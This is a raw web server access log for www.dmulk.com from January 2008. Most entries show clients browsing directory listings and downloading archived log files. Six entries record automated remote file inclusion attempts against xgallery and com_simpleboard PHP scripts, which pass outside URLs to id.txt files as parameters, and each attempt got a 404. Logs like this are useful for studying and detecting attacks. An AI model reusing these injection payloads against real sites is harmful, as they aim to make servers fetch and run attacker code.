194.72.9.24 - - [16/Jan/2008:15:24:19 -0800] "GET /logs/access_071221.log HTTP/1.1" 200 167044 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:21 -0800] "GET /logs/access_071213.log HTTP/1.1" 200 79346 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:21 -0800] "GET /logs/access_071019.log HTTP/1.1" 200 78488 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:22 -0800] "GET /logs/access_070811.log HTTP/1.1" 200 94297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:23 -0800] "GET /logs/access_070710.log HTTP/1.1" 200 32027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:24 -0800] "GET /logs/access_071205.log HTTP/1.1" 200 50665 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:24 -0800] "GET /logs/access_071127.log HTTP/1.1" 200 203829 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:25 -0800] "GET /logs/access_070803.log HTTP/1.1" 200 56048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:25 -0800] "GET /logs/access_071026.log HTTP/1.1" 200 67672 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:27 -0800] "GET /logs/access_070927.log HTTP/1.1" 200 42324 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:28 -0800] "GET /logs/access_070702.log HTTP/1.1" 200 2893 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:28 -0800] "GET /logs/access_071119.log HTTP/1.1" 200 21994 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:28 -0800] "GET /logs/access_071220.log HTTP/1.1" 200 140699 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:28 -0800] "GET /logs/access_071018.log HTTP/1.1" 200 24286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:29 -0800] "GET /logs/access_070919.log HTTP/1.1" 200 35028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:30 -0800] "GET /logs/access_071212.log HTTP/1.1" 200 89527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:31 -0800] "GET /logs/access_070810.log HTTP/1.1" 200 58508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:32 -0800] "GET /logs/access_071204.log HTTP/1.1" 200 9222 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:32 -0800] "GET /logs/access_071126.log HTTP/1.1" 200 40511 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:33 -0800] "GET /logs/access_070802.log HTTP/1.1" 200 35303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:33 -0800] "GET /logs/access_071025.log HTTP/1.1" 200 25205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:34 -0800] "GET /logs/access_070926.log HTTP/1.1" 200 34093 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:34 -0800] "GET /logs/access_071118.log HTTP/1.1" 200 27859 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:35 -0800] "GET /logs/access_071017.log HTTP/1.1" 200 21727 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:36 -0800] "GET /logs/access_070918.log HTTP/1.1" 200 51808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:15:24:36 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:15:24:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [16/Jan/2008:15:24:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:37 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:37 -0800] "GET /logs/access_071211.log HTTP/1.1" 200 128565 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:39 -0800] "GET /mobileoffice/?N=D HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:40 -0800] "GET /logs/access_071009.log HTTP/1.1" 200 26112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:40 -0800] "GET /mobileoffice/?N=A HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:41 -0800] "GET /warboard/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:41 -0800] "GET /imperant/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:42 -0800] "GET /megumi/ HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:42 -0800] "GET /logs/access_071203.log HTTP/1.1" 200 58478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:43 -0800] "GET /megumi/Bracelet/ HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:44 -0800] "GET /megumi/Bracelet/?M=A HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:44 -0800] "GET /megumi/Bracelet/?M=D HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:44 -0800] "GET /megumi/Bracelet/?D=A HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:45 -0800] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:45 -0800] "GET /megumi/Bracelet/?D=D HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:46 -0800] "GET /megumi/earrings/?M=A HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:46 -0800] "GET /megumi/earrings/?D=A HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:47 -0800] "GET /megumi/earrings/?M=D HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:47 -0800] "GET /megumi/earrings/?D=D HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:47 -0800] "GET /megumi/?M=A HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:47 -0800] "GET /megumi/Necklace/ HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:48 -0800] "GET /megumi/?M=D HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:48 -0800] "GET /megumi/?D=A HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:49 -0800] "GET /logs/access_071125.log HTTP/1.1" 200 42156 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:49 -0800] "GET /logs/access_070801.log HTTP/1.1" 200 22773 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:50 -0800] "GET /megumi/?D=D HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:51 -0800] "GET /logs/access_071024.log HTTP/1.1" 200 11603 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:51 -0800] "GET /logs/access_070925.log HTTP/1.1" 200 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:51 -0800] "GET /minamijewelry/source_images/updated1/?M=A HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:52 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.1" 200 12446 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:24:52 -0800] "GET /logs/access_071117.log HTTP/1.1" 200 175839 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:54 -0800] "GET /megumi/Necklace/?M=A HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:56 -0800] "GET /megumi/Necklace/?M=D HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:57 -0800] "GET /logs/access_071109.log HTTP/1.1" 200 29983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:24:58 -0800] "GET /logs/access_071210.log HTTP/1.1" 200 177334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:58 -0800] "GET /logs/access_071008.log HTTP/1.1" 200 53442 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:00 -0800] "GET /logs/access_070909.log HTTP/1.1" 200 75478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:00 -0800] "GET /logs/access_071031.log HTTP/1.1" 200 21492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:02 -0800] "GET /logs/access_071202.log HTTP/1.1" 200 60645 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:02 -0800] "GET /logs/access_071124.log HTTP/1.1" 200 55613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:03 -0800] "GET /logs/access_070629.log HTTP/1.1" 200 29210 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:04 -0800] "GET /minamijewelry/html/terms.html HTTP/1.1" 200 13534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:04 -0800] "GET /logs/access_071023.log HTTP/1.1" 200 25506 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:05 -0800] "GET /minamijewelry/source_images/?M=A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:06 -0800] "GET /logs/access_070924.log HTTP/1.1" 200 106285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:06 -0800] "GET /logs/?M=A HTTP/1.1" 200 30396 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:08 -0800] "GET /logs/access_071116.log HTTP/1.1" 200 80772 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:09 -0800] "GET /retreat1/?A HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:10 -0800] "GET /logs/?M=D HTTP/1.1" 200 30396 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:11 -0800] "GET /logs/scripts.log HTTP/1.1" 200 135781 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:13 -0800] "GET /minamijewelry/source_images/updated1/?D=A HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:13 -0800] "GET /logs/access_071015.log HTTP/1.1" 200 23717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:14 -0800] "GET /logs/access_070916.log HTTP/1.1" 200 144658 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:15 -0800] "GET /minamijewelry/source_images/updated1/?D=D HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:16 -0800] "GET /megumi/Necklace/?D=A HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:17 -0800] "GET /logs/access_071108.log HTTP/1.1" 200 10768 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:17 -0800] "GET /minamijewelry/moon.psd HTTP/1.1" 200 108656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:18 -0800] "GET /megumi/Necklace/?D=D HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:19 -0800] "GET /retreat1/webcam/ HTTP/1.1" 200 589505 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:21 -0800] "GET /logs/access_071007.log HTTP/1.1" 200 56320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:22 -0800] "GET /logs/access_070908.log HTTP/1.1" 200 91498 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:22 -0800] "GET /retreat1/work/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:23 -0800] "GET /logs/access_071030.log HTTP/1.1" 200 28194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:24 -0800] "GET /logs/access_070729.log HTTP/1.1" 200 26979 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:25 -0800] "GET /logs/access_071201.log HTTP/1.1" 200 44753 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:25 -0800] "GET /logs/access_071123.log HTTP/1.1" 200 53071 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:27 -0800] "GET /logs/access_070628.log HTTP/1.1" 200 28980 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:27 -0800] "GET /logs/access_071022.log HTTP/1.1" 200 18527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:28 -0800] "GET /logs/access_070923.log HTTP/1.1" 200 55220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:28 -0800] "GET /mobileoffice/?M=A HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:29 -0800] "GET /minamijewelry/html/return.html HTTP/1.1" 200 14804 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:30 -0800] "GET /logs/access_071115.log HTTP/1.1" 200 56806 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:30 -0800] "GET /minamijewelry/source_images/?D=A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:31 -0800] "GET /logs/?D=A HTTP/1.1" 200 31023 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:31 -0800] "GET /mobileoffice/?M=D HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:33 -0800] "GET /minamijewelry/source_images/?D=D HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:33 -0800] "GET /logs/access_071014.log HTTP/1.1" 200 26799 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:35 -0800] "GET /logs/?D=D HTTP/1.1" 200 30396 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:37 -0800] "GET /logs/access_070915.log HTTP/1.1" 200 65779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:38 -0800] "GET /logs/access_071107.log HTTP/1.1" 200 32202 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:39 -0800] "GET /logs/access.log HTTP/1.1" 200 367669 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:41 -0800] "GET /logs/access_071130.log HTTP/1.1" 200 58566 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:15:25:43 -0800] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:43 -0800] "GET /logs/access_071006.log HTTP/1.1" 200 58327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:15:25:44 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:44 -0800] "GET /logs/access_080109.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:15:25:45 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:45 -0800] "GET /funny/?M=A HTTP/1.1" 200 812 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:46 -0800] "GET /logs/access_070907.log HTTP/1.1" 200 61100 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:47 -0800] "GET /?M=A HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:47 -0800] "GET /logs/access_070829.log HTTP/1.1" 200 34921 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:48 -0800] "GET /?M=D HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:49 -0800] "GET /funny/?M=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:49 -0800] "GET /logs/access_070930.log HTTP/1.1" 200 32172 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:49 -0800] "GET /logs/access_070728.log HTTP/1.1" 200 41969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:50 -0800] "GET /logs/access_071122.log HTTP/1.1" 200 35217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:51 -0800] "GET /logs/access_070627.log HTTP/1.1" 200 163174 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:52 -0800] "GET /logs/access_071021.log HTTP/1.1" 200 17408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:25:53 -0800] "GET /logs/access_070922.log HTTP/1.1" 200 143145 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:54 -0800] "GET /minamijewelry/html/custom.html HTTP/1.1" 200 12705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:55 -0800] "GET /logs/access_071114.log HTTP/1.1" 200 7669 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:56 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
